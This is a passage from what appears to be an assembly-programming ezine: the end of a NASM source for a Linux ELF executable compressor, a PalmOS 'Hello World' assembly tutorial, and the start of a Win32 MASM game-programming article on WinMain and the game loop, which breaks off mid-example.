push eax
push ecx
push esi
push edi
mov eax,dword [konyc_dat]
sub eax,esi
mov ecx,eax
jecxz scan_L03
scan_L01:
repz cmpsb
jnz scan_L02
inc eax ; last byte is in chain and must be counted
scan_L02:
sub eax,ecx
cmp eax,1 ; chain must be minimal 2 bytes long
jbe scan_L03
cmp eax,edx
jc scan_L03
xchg edx,eax
mov ebx,esi
sub ebx,edi ; EBX=shift=deta
scan_L03:
pop edi
pop esi
pop ecx
pop eax
jmp short scan_L00
scan_L04:
pop edi
pop esi
xchg edx,eax
ret
; -------
scan_ncd:
; input: chain on ESI , EAX requested lenght with shift = [last_delta]
; return: EAX max. lenght ( 0 or 1 for chain not found )
cmp dword [last_delta], byte 0
jnz mozno_aj_bude
xor eax,eax
ret
mozno_aj_bude:
push ecx
push esi
push edi
mov edi,esi
sub edi,dword [last_delta]
mov ecx,eax
repz cmpsb
pop edi
pop esi
jnz scan_ncd_0
inc eax ; last byte is in chain and must be counted
scan_ncd_0:
sub eax,ecx
pop ecx
ret
scanincd:
; input: chain on ESI , EAX requested lenght with shift = [last_delta]
; return: CLC ( Carry Flag = 0 ) if chain found , STC (CF=1) if not found
cmp dword [last_delta], byte 0
jnz mozno_aj_bude_0
stc
ret
mozno_aj_bude_0:
push ecx
push esi
push edi
mov edi,esi
sub edi,dword [last_delta]
mov ecx,eax
repz cmpsb
pop edi
pop esi
jnz nebude_any_ket_sa_zesere_z_blbych_pocytov
jecxz zeserau_sa_z_blbych_pocytov
nebude_any_ket_sa_zesere_z_blbych_pocytov:
stc
pop ecx
ret
zeserau_sa_z_blbych_pocytov:
clc
pop ecx
ret
; -------
scan_lim:
; input: chain on ESI , EAX chain lenght , EAX > 1
; return: EBX minimal delta
; this procedure is useful for calling after call scan002 to scan shorter
; chains on this same ESI
; call scan_lim assumes that on ESI is a chain with {EAX} in
; <3,max_register_limit>
; call scan_lim with EAX = {EAX}-1, {EAX}-2, {EAX}-3, ... , 3, 2
; {EAX} is value returned after call scan002
push ecx
push edi
mov edi,esi
scan_lim_L00:
dec edi
; cmp edi,f0b ; call scan_lim assume that longer chain was
; ; found
; jc scan_lim_L00
mov ecx,eax
push esi
push edi
repz cmpsb
pop edi
pop esi
jnz scan_lim_L00
jecxz scan_lim_L01
jmp short scan_lim_L00
scan_lim_L01:
mov ebx,esi
sub ebx,edi
pop edi
pop ecx
ret
; -------
bitreq_02:
; input : EAX = number of bytes for pack request
; EBX = shift = delta ( if EAX = 2 or more )
; output : EDX = number of bits required for pack
; destroy: nothing
cmp eax,1
jnbe bitreq_more_bytes
bitreq_1_byte:
db 6Ah,7 ; push doubleword 7
pop edx ; make EDX=7
; scan if can be used 7 bits for pack 1 byte = 00h or 1 byte with shift < 16
; if this can't be used , pack by use 9 bits can be always used
; byte for compress is = 00h ?
cmp byte [esi],0
jz bitreq_7_bits ; 7 bits required ( sequence 1100000 )
bitreq_jak_skusas_co_skusas:
; byte isn't = 00h but explore if found equal byte with shift < 16
push eax
mov al,byte [esi]
push ecx
; xor ecx,ecx
; mov cl,15
db 6Ah,15
pop ecx
push edi
mov edi,esi
sub edi,ecx
cmp edi,f0b
jnc bitreq_pome_skusat
mov edi,f0b
mov ecx,esi
sub ecx,edi
bitreq_pome_skusat:
repnz scasb
pop edi
pop ecx
pop eax
jz bitreq_7_bits
; always can be used this mode but has bad pack ratio
; pack 1 byte , use 9 bits ( 1 byte + 1 bit )
mov dl,9
bitreq_7_bits:
mov al,1 ; 1 byte packed EAX=1
ret
bitreq_more_bytes:
cmp ebx,dword [last_delta]
jnz bitreq_another_delta
bitreq_old_delta:
bsr edx,eax ; ( bits / 2 ) for calculate bytes count
lea edx,[2*edx+4] ; 4 bits sequence 1000 don't calculate new
; delta
ret
bitreq_another_delta:
cmp ebx,byte 7Fh ; cmp ebx,7Fh requires 3 bytes
jnbe bitreq_big_delta_or_more_bytes
cmp eax,4
jnc bitreq_big_delta_or_more_bytes
; pack 2 or 3 bytes with delta <+0001h,+007Fh>
db 6Ah,8+3
pop edx ;mov edx,8+3 ; 8 bit = 1 byte for
; MOV BL,[ESI] INC ESI
ret ; 3 bit sequence 111 switch to this
; mode
bitreq_big_delta_or_more_bytes:
; pack 4 or more bytes with delta <+0001h,maximal_delta)
; pack 2 or more bytes with delta <+0080h,maximal_delta)
push eax
push ebx
cmp ebx,byte 7Fh
jnbe bitreq_high_delta
dec eax
dec eax ; invert for 2x INC ECX in decompress
bitreq_high_delta:
bsr eax,eax ; (bits/2) for calculate count
shr ebx,8 ; remove BL part of delta
inc ebx
inc ebx
inc ebx ; invert for 3x DEC EBX in decompress
bsr ebx,ebx ; (bits/2) for calculate delta without BL
add eax,ebx
lea edx,[2*eax+2+8] ; 2 bit sequence for switch to this mode
; 8 bit=1 byte for MOV BL,[ESI] INC ESI
pop ebx
pop eax
ret
; -------
pack002:
; input : EAX = number of bytes for pack request
; EBX = shift = delta ( if AX = 2 or more )
; output : EAX = number of bytes packed
cmp eax,1
jnbe pack_more_bytes
pack_1_byte:
; scan if can be used 7 bits for pack 1 byte = 00h or 1 byte with shift < 16
; if this can't be used , pack by use 9 bits can be always used
; byte for compress is = 00h ?
mov al,byte [esi]
or al,al
jz common_7_bits ; putbit sequence 1100000
jak_skusas_co_skusas:
; byte isn't = 00h but explore if found equal byte with shift < 16
xor ecx,ecx
mov cl,15
push edi
mov edi,esi
sub edi,ecx
cmp edi,f0b
jnc pome_skusat
mov edi,f0b
mov ecx,esi
sub ecx,edi
pome_skusat:
repnz scasb
pop edi
jnz jerk_it_off_and_try_again
xchg ecx,eax
inc eax ; EAX = shift (possitive value)
common_7_bits:
call putbit1
call putbit1
call putbit0
mov cl,4
shl al,cl
pbimu7: shl al,1
call putbit
loop pbimu7
jmp short pack_1_byte_common_end
jerk_it_off_and_try_again:
; always can be used this mode but has bad pack ratio
; pack 1 byte , use 9 bits ( 1 byte + 1 bit )
movsb
dec esi ; restore ESI to ESI before pack
call putbit0
pack_1_byte_common_end:
xor eax,eax
inc eax ; 1 byte packed EAX=1
ret
pack_more_bytes:
push eax ; store EAX for restore number of bytes packed
; ( by POP EAX )
cmp ebx,dword [last_delta]
jnz another_delta
pack_with_old_delta:
call putbit1
call putbit0
call putbit0
call putbit0 ; sequence 1000 don't calculate new delta
mov ecx,32
fdcd: dec ecx
shl eax,1
jnc fdcd ; shift bits left and remove highest bit=1
; this bit will be put by INC CX in decompress
mocd: shl eax,1
call putbit
dec ecx
jz mwocd
call putbit1
jmp short mocd
mwocd: call putbit0
pop eax ; packed EAX bytes from input buffer
ret
another_delta:
mov dword [last_delta],ebx ; all modes change last_delta
; cmp ebx,80h ; cmp ebx,80h require 6 bytes
; jnc big_delta_or_more_bytes
db 83h,0FBh,7Fh ;cmp ebx,7Fh ; cmp bx,7Fh requires 3 bytes
jnbe big_delta_or_more_bytes
cmp eax,4
jnc big_delta_or_more_bytes
; pack 2 or 3 bytes with delta <+0001h,+007Fh>
call putbit1
call putbit1 ; bit sequence 111 switch to this mode
; third bit 1 will be passed at end of
; packing before POP AX
sub al,3 ; value 2 -> CF=1, value 3 -> CF=0
adc bl,bl
xchg ebx,eax
stosb
call putbit1 ; put last control bit must be after
; STOSB (for mov bl,[esi] , inc esi)
; because when decompress , bits are
; processed first and byte second ->
; when compressing , byte must be
; processed before last bit
pop eax ; value 2 or 3
; -> this mode processes 2 or 3 bytes
ret
big_delta_or_more_bytes:
; pack 4 or more bytes with delta <+0001h,maximal_delta)
; pack 2 or more bytes with delta <+0080h,maximal_delta)
call putbit1
call putbit0
db 83h,0FBh,7Fh ;cmp ebx,7Fh
jnbe high_delta
dec eax
dec eax ; invert for 2x INC ECX in decompress
high_delta:
push eax
xchg ebx,eax
push eax ; push only for part in BL moved to AL
shr eax,8 ; this destroy AL
inc eax
inc eax
inc eax ; invert for 3x DEC EBX
mov ecx,32
fgfaad: dec ecx
shl eax,1
jnc fgfaad
wetryw: shl eax,1
call putbit
dec ecx
jz shsdwd
call putbit1
jmp short wetryw
shsdwd: call putbit0
pop ebx ; pop only for BL
pop eax ; pop bytes count
calculate_count:
mov ecx,32
fcdcd: dec ecx
shl eax,1
jnc fcdcd ; shift all bits left and remove highest bit=1
; this bit will be put by INC ECX in decompress
mwocdl: shl eax,1
call putbit
dec ecx
jz mwocdt
call putbit1
jmp short mwocdl
mwocdt:
xchg ebx,eax
stosb ; store AL (BL in decompress)
; as well in delta <+0001h,+007Fh> , stored
; byte must be before store last bit because
; when decompress, bit will be processed
; first and byte will be loaded later
call putbit0 ; this bit will be processed in
; decompress for calculate ECX ( JC U05 )
pop eax ; packed EAX bytes from input buffer
ret
; -------
; putbit input : Carry Flag (CF=0,CF=1)
; output : bit 0. in [position], EDI+1 as need for store bit to [EDI]
; destroy: nothing
putbit0:clc ; put bit=0
jmp short putbit
putbit1:stc ; put bit=1
putbit: push ebx
mov ebx,dword [position]
rcl byte [ebx],1
pop ebx
jnc o_C_1
o_C_0: mov byte [edi],1
mov dword [position],edi
inc edi
o_C_1: ret
; -------
progress:
pushad
mov esi,f0s_2
mov edi,progress_text+1
mov ebp,w1hch
lodsd
push eax
sub eax,dword [esi]
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
inc edi
inc edi
pop eax
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
mov ecx,progress_text
xor edx,edx
mov dl,progress_text_size
call WS
popad
ret
w1hch: push eax
and al,00001111b
cmp al,10
sbb al,69h
das
stosb
pop eax
ret
; -------
uncompress_routine:
pushfd
pushad
mov esi,0
mov edi,0
mov ecx,0
std
repz movsb
cld
xchg esi,edi
inc esi
db 83h,0EFh,fuyi - 1 ; sub edi,fuyi-1
push esi
mov esi,0
mov ebp,0 ; U13
mov dl,80h
ret
fuyi equ $ - uncompress_routine
uncompress_moved:
push eax
U00: movsb
U01: call ebp
jnc U00
xor ebx,ebx
call ebp
inc ecx
jnc U03
call ebp
jc U06
mov bl,10h
U02: call ebp
adc bl,bl
jnc U02
jnz U10
xchg ebx,eax
jmp short U12
U03: inc ebx
U04: call ebp
adc ebx,ebx
call ebp
jc U04
U05: call ebp
adc ecx,ecx
call ebp
jc short U05
dec ebx
dec ebx
jz short U09
dec ebx
shl ebx,8
;;;;;;; clc ; clc isn't needed because EBX < 01000000h before shift
U06: mov bl,byte [esi]
inc esi
jnc U07
shr bl,1
jz U15
sbb cl,ch ; equ SBB CL,BH because BH=CH=0
U07: ;cmp ebx,00007D00h ; this is not implemented, yet
;jnc zvys_o_dve ; i found this in WINCMD32.EXE v. 4.03
;cmp ebx,00000500h ; packed with ASPACK
;jnc zvys_o_jennu
; isn't rational compress 3 bytes with shift > 7CFFh
; rational is at least 4 bytes
; isn't rational compress 2 bytes with shift > 4FFh
; rational is at least 3 bytes
cmp ebx, byte 7Fh ;db 83h,0FBh,7Fh
jnbe U08
zvys_o_dve:
inc ecx
zvys_o_jennu:
inc ecx
U08: pop eax
db 0A8h ; opcodes A8 5B = TEST AL,5B
U09: pop ebx ; opcode 5B
push ebx
U10: neg ebx
U11: mov al,byte [edi+ebx]
U12: stosb
loop U11
jmp short U01
U13: add dl,dl ; get highest bit from control_byte
jnz U14 ; is it last non-zero bit ? = all 8 bits were
; processed ?
lodsb ; load control_byte
xchg edx,eax ; store control_byte to DL
adc dl,dl ; put last bit from last control_byte to bit 0.
; of new control_byte
U14: ret
U15: pop eax
popad
popfd
db 0E9h ; jump
dd 0
uncompress_routine_end:
uncompress_routine_size equ $ - uncompress_routine
; -------
MEOF db 'ERROR OPEN file!',0Ah
MEOFS equ $ - MEOF
MECF db 'ERROR CREAT file!',0Ah
MECFS equ $ - MECF
MSEEF db 'ERROR SEEK to END of file!',0Ah
MSEEFS equ $ - MSEEF
MSEBF db 'ERROR SEEK to BEGIN of file!',0Ah
MSEBFS equ $ - MSEBF
MERF db 'ERROR READ file!',0Ah
MERFS equ $ - MERF
MEWF db 'ERROR WRITE file!',0Ah
MEWFS equ $ - MEWF
usage db 0Ah,'K0mprezz ELF ASM executab1e fy1e usyng OOO alg0ry'
db 'thm',0Ah
db 0Ah,'usage: a00 '
db 'filename_for_compress compressed_filename',0Ah,0Ah
db 'ASM coding in LINUX by Feryno',0Ah
db 'Feryno: ASSEMBLER-only and DISASSEMBLER-only wonderfu'
db 'l'
db 0Ah,0Ah
usagesize equ $ - usage
progress_text db 0Dh,'00000000h/00000000h'
progress_text_size equ $ - progress_text
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
filesize equ $ - $$ ;;
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
SECTION .bss
ALIGNB 4
f0h resd 1 ; in_file handle
f1h resd 1 ; out_file handle
f0s_2 resd 1 ; in_file size
f0s resd 1 ; in_file size
position resd 1 ; required by putbit procedures
konyc_dat resd 1
last_delta resd 1
fy1eObuffer resb 4Ch ; header of a file
f0b resb 100000h ; kode & data of a fy1e
f0b_size equ $ - fy1eObuffer
f1b_size equ 200000h
f1b resb f1b_size
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
bsssize equ $ - $$ ;;
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
memsize equ filesize+bsssize ;;
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::........................................PALMOS.ENVIRONMENT
Hello Tiny World
by Latigo
Hola! This is a tutorial on assembler for the PalmOS environment. I decided
to write it due to the lack of material on the web. To assemble the asm
presented in this paper, you need to get Darrin Massena's ASDK, which can be
downloaded from http://www.massena.com/darrin/pilot/index.html. The ASDK
contains an assembler, a disassembler, the Palm emulator and many other great
tools. Massena is the low-level-semi-god-techno-guru who created the
assembler (Pila), along with many other tools and documents. He was my
starting point (and that of many others too) for asm coding in the Palm
environment.
The Palm uses a variation of the Motorola 68K CPU called 'DragonBall', which
has eight 32-bit Data registers (D0 to D7), eight Address registers (A0 to
A7, with A7 being the stack pointer), one PC register, the 'Program Counter',
which contains the address of the instruction to be executed next, and one
16-bit register called the Status Register (SR). Another thing to note is the
way operands are specified in the DragonBall environment. It's not 'DEST,SRC'
as in the Wintel world we all know, but 'SRC,DEST'. Say you wanted to copy
the entire contents of the D7 register to D0; this is how it's done:
'MOVE.L D7,D0'.
One last very important thing is how to specify data types. In the previous
example I used 'MOVE.L', where '.L' stands for a 'long' data type. I could
have used '.b' or '.w', meaning byte and word respectively. The size is
always appended, when suitable, to the instruction mnemonic. What I'm going
to show you here is something pretty basic, but it will be enough as a start.
It's the typical 'Hello World'.
Theory:
-------
We will create a basic Palm program in assembly which will make use of the
FrmAlert Systrap in order to display an Alert Resource.
Word FrmAlert (
Word alertId
);
As you can see, this Systrap (the word Systrap can be taken as a synonym of
the word 'API') takes one parameter: the ID of an Alert resource. There are
many resource types (String, Form, version, etc.) but we only care about the
'Alert' type. All this means that we must create a resource file (.rcp) which
includes our Alert, and the asm file (.asm) which contains the code to
display the Alert resource.
All this said, let's do some 'Hello tiny world' :)
The resource file (Hello.rcp):
------------------------------
; Here we are going to declare our resources. In this case only an Alert
; resource is going to be created since that's all we need
ALERT ID 1000
; This is the ID of our Alert.
INFORMATION
; This is the TYPE of the Alert. It could be [INFORMATION]
; or [CONFIRMATION] or [WARNING] or [ERROR]
BEGIN
; Beginning of the Alert resource. Let's define all its properties.
TITLE "Hello tiny World!"
; This would be the title of the Alert
MESSAGE "This is just the beginning!"
; Yes, you guessed. It's the Message
BUTTONS "Ciao :)"
; In this case we have only one button
END
; END of the Alert resource
The asm file (Hello.asm):
-------------------------
Appl "MBox", 'Lat1'
; This sets the program's name and ID. The name is the one that will show up
; in the installed program's list. The ID is that, an ID :)
include "Pilot.inc"
; Just like windows.inc, full of constants, structure offsets, API trap
; codes, etc.
include "Startup.inc"
; Startup.inc contains a standard startup function which must be the first
; within an application and is called by the PalmOS after the app is loaded.
; SysAppStartup is first executed, if it doesn't fail, then PilotMain in our
; app is called and after it returns, SysAppExit is called. In short, don't
; remove this :)
MyAlert equ 1000
; Some Constants
code
proc PilotMain(cmd.w, cmdPBP.l, launchFlags.w)
; Just like WinMain; PilotMain's prototype is in Pilot.inc.
; It takes three parameters, a WORD (cmd), a LONG (cmdPBP) and another WORD
; (launchFlags)
; Whenever parameters are passed to API calls, their size has to be specified
; too. So '.b' for a byte, '.w' for a word and '.l' for a long.
; Remember that PilotMain is called from Startup.inc!!
beginproc
; Marks the beginning of a procedure by reserving the needed space on the
; stack for local variables, if any. To do this it performs 'link a6,#nnnn',
; where #nnnn is the number of bytes.
TST.W cmd(a6)
; The PilotMain function is called many times in different circumstances, so
; here we check that the cmd parameter is 0 (sysAppLaunchCmdNormalLaunch is
; 0), which would mean a 'normal' program launch.
; TST.W cmd(a6) means 'CMP WORD PTR cmd,0' in the Intel environment. .W
; implies that only 2 bytes of the cmd variable will be TeSTed. cmd(a6) tells
; pila that cmd is addressed relative to A6, the frame pointer set up by
; link, so it is a parameter or LOCAL variable. Had it been cmd(a5), the
; assembler would know that cmd is a GLOBAL variable.
BNE PmReturn
; BNE = Branch Not Equal. Just like the beloved JNZ
systrap FrmAlert(#MyAlert.w)
; MessageBox! :) systrap is the keyword to invoke APIs; it PUSHes the
; specified parameters and cleans the stack after the API execution.
; # means that MyAlert is specifying a CONSTANT NUMBER and .w means that
; MyAlert is making reference to a WORD
;
; systrap FrmAlert(#MyAlert.w) would be the same as:
; move.w #MyAlert,-(a7) = decrement the stack pointer and push the alert id
; trap #15 = PalmOS API call
; dc.w sysTrapFrmAlert = invoke the alert dialog! by declaring the
;                        word that is equivalent to 'sysTrapFrmAlert'
; addq.l #2,a7 = correct stack
PmReturn
; Just a Label
endproc
; Sefiní, endproc executes the unlk and rts instructions
;-----------------------Resources------------------------------
; Here we must 'tell' pila about all the resources that we created so it will
; include them in our assembled code.
; We now declare ALL the resources being used by Hello.asm. The keyword 'res'
; comes first, followed by the TYPE of the resource.
;-=Alert Resources=-
res 'Talt', MyAlert, "Talt03e8.bin"
; This resource defines launch flags, stack and heap size :)
res 'pref', 1
dc.w sysAppLaunchFlagNewStack|sysAppLaunchFlagNewGlobals|sysAppLaunchFlagUIApp|sysAppLaunchFlagSubCall
dc.l $1000 ; stack size
dc.l $1000 ; heap size
;------------------------------ end --------------------------------------------
That's all my friends! To assemble and link this program execute the
following:
pilrc Hello.rcp
pila Hello.asm
Pilrc being the resource compiler and pila the assembler of course.
Well, that's it! Easy huh? Next time I'll complicate things a little bit by
including a Form :)
Should your Palm Asm hunger be unstoppable, you could check my site
for more coding and reversing stuff: www.latigo.cjb.net.
Take Care! Bye!
Latigo
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::.............................................GAMING.CORNER
Win32 ASM Game Programming - Part 2
by Chris Hobbs
[This series of articles was first posted at GameDev.net and is now being
published here with the author's permission. Here is Chris Hobbs'
introduction to this particular article:
"A continuation of the development of SPACE-TRIS. This one covers the coding
of WinMain, a Direct Draw library, and a Bitmap library."
Visit his website at http://www.fastsoftware.com.
Preface, Html-to-Txt conversion and formatting by Chili]
Where Did We Leave Off?
-----------------------
The last article discussed many basics of Win32 ASM programming, introduced
you to the game we will be creating, and guided you through the design
process. Now it is time to take it a few steps further. First, I will cover,
in depth, the High Level constructs of MASM that make it extremely readable
(at generally no performance cost), and make it as easy to write as C
expressions. Then, once we have a solid foundation in our assembler, we will
take a look at the Game Loop and the main Windows procedures in the code.
With that out of the way we will take a peek at Direct Draw and the calls
associated with it. Once we understand how DirectX works we can build our
Direct Draw library. After that we will build our bitmap file library.
Finally, we will put it all together in a program that displays our Loading
Game screen and exits when you hit the escape key.
It is a pretty tall order but I am pretty sure we can cover all of the topics
in this article. Remember: If you want to compile the code you need the
MASM32 [http://www.pbq.com.au/home/hutch/] package, or at the very least a
copy of MASM 6.11+.
If you are already familiar with MASM's HL syntax then I would suggest
skipping the next section. However, those of you who are rusty, or have never
even heard of it, head on to the next section. There you will learn more than
you will probably ever need to know about this totally cool addition to our
assembler.
MASM's HL Syntax
----------------
I am sure many of you have seen an old DOS assembly language listing. Take a
moment to recall that listing, and picture the code. Scary? Well, 9 times out
of 10 it was scary. Most ASM programmers wrote very unreadable code, simply
because that was the nature of their assembler. It was littered with labels
and jmp's, and all sorts of other mysterious things. Try stepping through it
with your mental computer. Did you crash? Yeah, don't feel bad. It is just
how it is. Now, that was the 9 out of 10 ... what about that 1 out of 10?
What is the deal with them? Well, those are the programmers who coded MACROs
to facilitate High Level constructs in their programs. For once, Microsoft
did something incredibly useful with MASM 6.0 ... they built those HL MACROs,
that smart programmers had devised, into MASM as pseudo-ops.
If you aren't aware of what this means I will let you in on it. MASM's
assembly code is now just as readable and easy to write as C. This, of
course, is just my opinion. But, it is an opinion shared by thousands and
thousands of ASM coders. So, now that I have touted its usefulness let's take
a look at some C constructs and their MASM counterparts.
IF - ELSE IF - ELSE
The C version:                  The MASM version:
if ( var1 == var2 )             .if ( var1 == var2 )
{                                   ; Code goes here
    // Code goes here           .elseif ( var1 == var3 )
}                                   ; Code goes here
else                            .else
if ( var1 == var3 )                 ; Code goes here
{                               .endif
    // Code goes here
}
else
{
    // Code goes here
}
DO - WHILE
The C version:                  The MASM version:
do                              .repeat
{                                   ; Code goes here
    // Code goes here           .until ( var1 != var2 )
}
while ( var1 == var2 );
WHILE
The C version:                  The MASM version:
while ( var1 == var2 )          .while ( var1 == var2 )
{                                   ; Code goes here
    // Code goes here           .endw
}
Those are the constructs that we can use in our code. As you can see they are
extremely simple and allow for nice readable code, something assembly
language has long been without. There is no performance loss for using these
constructs, at least I haven't found any. They typically generate the same
jmp and cmp code that a programmer would if he were writing it with labels
and such. So, feel free to use them in your code as you see fit ... they are
a great asset.
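To see what "the same jmp and cmp code" means in practice, here is a small
sketch. It is written in C rather than MASM so that it can be compiled
anywhere, and the function names are made up for the illustration. The first
function uses a structured loop; the second spells out by hand the
compare-and-jump skeleton that such a loop boils down to, which is roughly
what the HL constructs save you from typing.

```c
/* Structured form: the shape you get with .while / .endw */
unsigned count_down_structured(unsigned n)
{
    unsigned steps = 0;
    while (n != 0) {
        n--;
        steps++;
    }
    return steps;
}

/* Hand-lowered form: the same loop written with labels and jumps,
   the way it would look without the HL constructs. */
unsigned count_down_labels(unsigned n)
{
    unsigned steps = 0;
loop_top:
    if (n == 0)             /* cmp n, 0 / je loop_done */
        goto loop_done;
    n--;
    steps++;
    goto loop_top;          /* jmp loop_top */
loop_done:
    return steps;
}
```

Both functions return the same count for any input; only the amount of
bookkeeping left to the programmer differs.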
There is one other thing we should discuss and that is the pseudo-ops that
allow us to define procedures/functions easily: PROTO and PROC. Using them is
really simple. To begin with, just as in C, you need to have a prototype. In
MASM this is done with the PROTO keyword. Here are some examples of declaring
prototypes for your procedures:
;==================================
; Main Program Procedures
;==================================
WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD
WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
The above code tells the assembler it should expect a procedure by the name
of WinMain and one by the name of WndProc. Each of these has a parameter list
associated with it. They both happen to expect 4 DWORD values to be passed to
them. For those of you using the MASM32 package, you already have all of the
Windows API functions prototyped; you just need to include the appropriate
include file. But, you need to make sure that any user defined procedure is
prototyped in the above fashion.
Once we have the function prototyped we can create it. We do this with the
PROC keyword. Here is an example:
;########################################################################
; WinMain Function
;########################################################################
WinMain PROC hInstance :DWORD,
hPrevInst :DWORD,
CmdLine :DWORD,
CmdShow :DWORD
;===========================
; We are through
;===========================
return msg.wParam
WinMain endp
;########################################################################
; End of WinMain Procedure
;########################################################################
By writing our functions in this manner we can access all passed parameters
by the name we give to them. The above function is WinMain w/o any code in
it. You will see the code in a minute. For now though, pay attention to how
we set up the procedure. Also notice how it allows us to create much cleaner
looking code, just like the rest of the high level constructs in MASM do.
Getting A Game Loop Running
---------------------------
Now that we all know how to use our assembler, and the features contained in
it, let's get a basic game shell up and running.
The first thing we need to do is get set up to enter into WinMain(). You may
be wondering why the code doesn't start at WinMain() like in C/C++. The
answer is: in C/C++ it doesn't start there either. The code that we will
write is generated for you by the compiler, therefore it is completely
transparent to you. We will most likely do it differently than the compiler,
but the premise will be the same. So here is what we will code to get into
the WinMain() function...
.CODE
start:
;==================================
; Obtain the instance for the
; application
;==================================
INVOKE GetModuleHandle, NULL
MOV hInst, EAX
;==================================
; Is there a commandline to parse?
;==================================
INVOKE GetCommandLine
MOV CommandLine, EAX
;==================================
; Call the WinMain procedure
;==================================
INVOKE WinMain,hInst,NULL,CommandLine,SW_SHOWDEFAULT
;==================================
; Leave the program
;==================================
INVOKE ExitProcess,EAX
The only thing that may seem a little confusing is why we MOV EAX into a
variable at the end of an INVOKE. The reason is all Windows functions, and C
functions for that matter, place the return value of a function/procedure in
EAX. So we are effectively doing an assignment statement with a function when
we move a value from EAX into something. This code above is going to be the
same for every Windows application that you write. At least, I have never had
need to change it. The code simply sets everything up and ends it when we are
finished.
If you follow the code you will see that it calls WinMain() for us. This is
where things can get a bit confusing ... so let's have a look at the code
first.
;########################################################################
; WinMain Function
;########################################################################
WinMain PROC hInstance :DWORD,
hPrevInst :DWORD,
CmdLine :DWORD,
CmdShow :DWORD
;====================
; Put LOCALs on stack
;====================
LOCAL wc :WNDCLASS
;==================================================
; Fill WNDCLASS structure with required variables
;==================================================
MOV wc.style, CS_OWNDC
MOV wc.lpfnWndProc,OFFSET WndProc
MOV wc.cbClsExtra,NULL
MOV wc.cbWndExtra,NULL
m2m wc.hInstance,hInst ;<< NOTE: macro not mnemonic
INVOKE GetStockObject, BLACK_BRUSH
MOV wc.hbrBackground, EAX
MOV wc.lpszMenuName,NULL
MOV wc.lpszClassName,OFFSET szClassName
INVOKE LoadIcon, hInst, IDI_ICON ; icon ID
MOV wc.hIcon,EAX
INVOKE LoadCursor,NULL,IDC_ARROW
MOV wc.hCursor,EAX
;================================
; Register our class we created
;================================
INVOKE RegisterClass, ADDR wc
;===========================================
; Create the main screen
;===========================================
INVOKE CreateWindowEx,NULL,
ADDR szClassName,
ADDR szDisplayName,
WS_POPUP OR WS_CLIPSIBLINGS OR \
WS_MAXIMIZE OR WS_CLIPCHILDREN,
0,0,640,480,
NULL,NULL,
hInst,NULL
;===========================================
; Put the window handle in for future uses
;===========================================
MOV hMainWnd, EAX
;====================================
; Hide the cursor
;====================================
INVOKE ShowCursor, FALSE
;===========================================
; Display our Window we created for now
;===========================================
INVOKE ShowWindow, hMainWnd, SW_SHOWDEFAULT
;=================================
; Initialize the Game
;=================================
INVOKE Game_Init
;========================================
; Check for an error if so leave
;========================================
.IF EAX != TRUE
JMP shutdown
.ENDIF
;===================================
; Loop until PostQuitMessage is sent
;===================================
.WHILE TRUE
INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE
.IF (EAX != 0)
;===================================
; Break if it was the quit message
;===================================
MOV EAX, msg.message
.IF EAX == WM_QUIT
;======================
; Break out
;======================
JMP shutdown
.ENDIF
;===================================
; Translate and Dispatch the message
;===================================
INVOKE TranslateMessage, ADDR msg
INVOKE DispatchMessage, ADDR msg
.ENDIF
;================================
; Call our Main Game Loop
;
; NOTE: This is done every loop
; iteration no matter what
;================================
INVOKE Game_Main
.ENDW
shutdown:
;=================================
; Shutdown the Game
;=================================
INVOKE Game_Shutdown
;=================================
; Show the Cursor
;=================================
INVOKE ShowCursor, TRUE
getout:
;===========================
; We are through
;===========================
return msg.wParam
WinMain endp
;########################################################################
; End of WinMain Procedure
;########################################################################
This is quite a bit of code and is rather daunting at first glance. But,
let's examine it a piece at a time. First we enter the function; notice that
the local variables (in this case a WNDCLASS variable) get placed on the
stack without your having to code anything. The code is generated for you ...
you can declare local variables like in C. Thus, at the end of the procedure
we don't need to tell the assembler how much to pop off of the stack ... it
is done for us also. Then, we fill in this structure with various values and
variables. Note the use of m2m. This is because in ASM you are not allowed to
move a memory value to another memory location w/o placing it in a register,
or on the stack, first.
Next, we make some calls to register our window class and create a new
window. Then, we hide the cursor. You may want the cursor ... but for our
game we do not. Now we can show our window and try to initialize our game. We
check for an error after calling the Game_Init() procedure. If there was an
error the function would not return TRUE and this would cause our program to
jump to the shutdown label. It is important that we jump over the main
message loop. If we do not, the program will carry on into the loop even
though initialization failed. Also, make sure that you do not just return out
of the code ... there still may be some things that need to be shut down. It
is good practice in ASM, just as in all other languages, to have one entry
point and one exit point in each of your procedures -- this makes debugging
easier.
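The "jump to shutdown, never return early" rule can be sketched in a few
lines of C. Everything here is a hypothetical stand-in (game_init,
game_shutdown, run_game and the frame counter are not part of the game's
source); the point is only the control flow: a failed init skips the loop,
yet the cleanup code still runs and the function leaves through one exit.

```c
#include <stdbool.h>

/* Hypothetical stand-ins for Game_Init / Game_Shutdown. */
static int shutdown_calls = 0;
static bool game_init(bool succeed) { return succeed; }
static void game_shutdown(void)     { shutdown_calls++; }

/* Returns the number of loop iterations that actually ran. */
int run_game(bool init_ok, int frames)
{
    int ran = 0;

    if (!game_init(init_ok))
        goto shutdown;          /* jump over the main loop */

    while (ran < frames)
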